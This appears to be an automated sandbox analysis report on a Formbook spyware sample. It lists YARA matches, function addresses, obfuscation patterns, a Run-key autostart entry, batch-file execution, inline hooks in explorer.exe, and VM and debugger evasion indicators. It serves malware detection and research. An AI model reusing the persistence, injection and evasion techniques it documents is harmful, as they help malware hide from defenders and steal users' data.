 Source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Contains functionality to call native functions
 Detected potential crypto function
 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_00401030 9_2_00401030 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041D97B 9_2_0041D97B Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041DADA 9_2_0041DADA Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041DBC0 9_2_0041DBC0 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_00402D90 9_2_00402D90 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041DDA4 9_2_0041DDA4 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041E654 9_2_0041E654 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041DE0B 9_2_0041DE0B Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_00409E2E 9_2_00409E2E Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_00409E30 9_2_00409E30 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041CEE3 9_2_0041CEE3 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041CEE6 9_2_0041CEE6 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041DEFF 9_2_0041DEFF Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0041DF1F 9_2_0041DF1F Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_00402FB0 9_2_00402FB0 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0319EBB0 9_2_0319EBB0 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0316F900 9_2_0316F900 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_03184120 9_2_03184120 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_03221002 9_2_03221002 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0317B090 9_2_0317B090 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_031920A0 9_2_031920A0 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_03186E30 9_2_03186E30 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_03160D20 9_2_03160D20 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_03231D55 9_2_03231D55 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_03192581 9_2_03192581 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0317D5E0 9_2_0317D5E0 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_0317841F 9_2_0317841F Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: 19_3_04B26EB0 19_3_04B26EB0 Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: 19_3_04B26EB0 19_3_04B26EB0 Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: 19_3_04B26EB0 19_3_04B26EB0 Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: 19_3_04B26EB0 19_3_04B26EB0 Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: 19_3_04B26EB0 19_3_04B26EB0 Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: 19_3_04B26EB0 19_3_04B26EB0 Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: 19_3_04B26EB0 19_3_04B26EB0 Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: 19_3_04B26EB0 19_3_04B26EB0
 Found potential string decryption / allocating functions
 Source: C:\Windows\SysWOW64\notepad.exe Code function: String function: 50484224 appears 50 times Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: String function: 0231C890 appears 48 times Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 0316B150 appears 32 times Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: String function: 04B2B4A4 appears 32 times Source: C:\Users\user\AppData\Local\Mqbmnet.exe Code function: String function: 04B23AF4 appears 40 times
 PE / OLE file has an invalid certificate
 Source: Mqbmupv_Signed_.exe Static PE information: invalid certificate
 PE file contains strange resources
 Source: Mqbmupv_Signed_.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST Source: Mqbmupv_Signed_.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST Source: Mqbmnet.exe.0.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST Source: Mqbmnet.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
 Sample file is different than original file name gathered from version info
 Source: Mqbmupv_Signed_.exe, 00000000.00000000.204808352.0000000000465000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameYes( vs Mqbmupv_Signed_.exe
 Yara signature match
 Classification label
 Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@24/9@5/5
 Contains functionality to check free disk space
 Source: C:\Windows\SysWOW64\notepad.exe Code function: 2_2_5048784E GetDiskFreeSpaceA, 2_2_5048784E
 Creates files inside the user directory
 Creates mutexes
 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6436:120:WilError_01 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_01
 Executes batch files
 Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
 Parts of this applications are using Borland Delphi (Probably coded in Delphi)
 Sample is known by Antivirus
 Source: Mqbmupv_Signed_.exe Virustotal: Detection: 27% Source: Mqbmupv_Signed_.exe ReversingLabs: Detection: 45%
 Sample reads its own file content
 Spawns processes
 Uses an in-process (OLE) Automation server
 Writes ini files
 Found graphical window changes (likely an installer)
 Source: Window Recorder Window detected: More than 3 window changes detected
 Checks if Microsoft Office is installed
 Binary contains paths to debug symbols
 Source: Binary string: ipconfig.pdb source: ieinstal.exe, 00000009.00000002.344052381.00000000009D0000.00000040.00000001.sdmp Source: Binary string: ipconfig.pdbGCTL source: ieinstal.exe, 00000009.00000002.344052381.00000000009D0000.00000040.00000001.sdmp Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000F.00000000.317337794.000000000EEC0000.00000002.00000001.sdmp Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000009.00000002.345112527.0000000003140000.00000040.00000001.sdmp Source: Binary string: wntdll.pdb source: ieinstal.exe Source: Binary string: wscui.pdb source: explorer.exe, 0000000F.00000000.317337794.000000000EEC0000.00000002.00000001.sdmp

### Data Obfuscation:

 Uses code obfuscation techniques (call, push, ret)
 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_0231AAF8 push 004069CEh; ret 0_3_0231AB32 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_0231A6D4 push 004065C3h; ret 0_3_0231A727 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_04C60BE8 push eax; ret 0_3_04C60C24 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_0231C1D4 push eax; ret 0_3_0231C210 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_0231C1D4 push eax; ret 0_3_0231C210 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_0231C1D4 push eax; ret 0_3_0231C210 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_0231C1D4 push eax; ret 0_3_0231C210 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_0231C1D4 push eax; ret 0_3_0231C210 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_0231C1D4 push eax; ret 0_3_0231C210 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_0231C1D4 push eax; ret 0_3_0231C210 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_0231C1D4 push eax; ret 0_3_0231C210 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_0231C1D4 push eax; ret 0_3_0231C210 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_0231C1D4 push eax; ret 0_3_0231C210 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_0231C1D4 push eax; ret 0_3_0231C210 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_0231C1D4 push eax; ret 0_3_0231C210 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_0231C1D4 push eax; ret 0_3_0231C210 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_0231C1D4 push eax; ret 0_3_0231C210 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_0231C1D4 push eax; ret 0_3_0231C210 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_0231C1D4 push eax; ret 0_3_0231C210 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_0231C1D4 push eax; ret 0_3_0231C210 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_0231C1D4 push eax; ret 0_3_0231C210 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_0231C1D4 push eax; ret 0_3_0231C210 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_0231C1D4 push eax; ret 0_3_0231C210 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_0231C1D4 push eax; ret 0_3_0231C210 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_0231C1D4 push eax; ret 0_3_0231C210 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_0231C1D4 push eax; ret 0_3_0231C210 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Code function: 0_3_0231C1D4 push eax; ret 0_3_0231C210 Source: C:\Windows\SysWOW64\notepad.exe Code function: 2_2_504878E8 push ecx; mov dword ptr [esp], eax 2_2_504878E9 Source: C:\Windows\SysWOW64\notepad.exe Code function: 2_2_504911D0 push ecx; mov dword ptr [esp], ecx 2_2_504911D5 Source: C:\Windows\SysWOW64\notepad.exe Code function: 2_2_50486192 push 504861C0h; ret 2_2_504861B8 Source: C:\Windows\SysWOW64\notepad.exe Code function: 2_2_50486194 push 504861C0h; ret 2_2_504861B8

### Persistence and Installation Behavior:

 Uses ipconfig to lookup or modify the Windows network settings
 Source: unknown Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
 Drops PE files
 Creates an autostart registry key
 Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Mqbm Jump to behavior Source: C:\Users\user\Desktop\Mqbmupv_Signed_.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Mqbm Jump to behavior

### Hooking and other Techniques for Hiding and Protection:

 Modifies the prolog of user mode functions (user mode inline hooks)
 Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE6
 Disables application error messsages (SetErrorMode)

### Malware Analysis System Evasion:

 Tries to detect virtualization through RDTSC time measurements
 Contains functionality for execution timing, often used to detect debuggers
 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_00409A80 rdtsc 9_2_00409A80
 Contains long sleeps (>= 3 min)
 May sleep (evasive loops) to hinder dynamic analysis
 Sample execution stops while process was sleeping (likely an evasion)
 Source: C:\Windows\System32\conhost.exe Last function: Thread delayed Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
 Contains functionality to enumerate / list files inside a directory
 May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
 Source: explorer.exe, 0000000F.00000000.299569012.00000000056CA000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0 Source: explorer.exe, 0000000F.00000000.299686125.0000000005775000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000 Source: explorer.exe, 0000000F.00000000.305257074.00000000078D0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed. Source: explorer.exe, 0000000F.00000000.299460136.0000000005644000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b} Source: explorer.exe, 0000000F.00000000.299569012.00000000056CA000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00 Source: explorer.exe, 0000000F.00000000.299460136.0000000005644000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}& Source: explorer.exe, 0000000F.00000000.317040333.000000000E8E3000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}L Source: explorer.exe, 0000000F.00000000.301071051.0000000006414000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\$% Source: explorer.exe, 0000000F.00000000.299569012.00000000056CA000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000 Source: explorer.exe, 0000000F.00000000.305257074.00000000078D0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service. Source: explorer.exe, 0000000F.00000000.305257074.00000000078D0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported. Source: explorer.exe, 0000000F.00000000.299569012.00000000056CA000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000 Source: explorer.exe, 0000000F.00000000.305257074.00000000078D0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
 Queries a list of all running processes
 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information queried: ProcessInformation Jump to behavior

### Anti Debugging:

 Checks if the current process is being debugged
 Contains functionality for execution timing, often used to detect debuggers
 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 9_2_00409A80 rdtsc 9_2_00409A80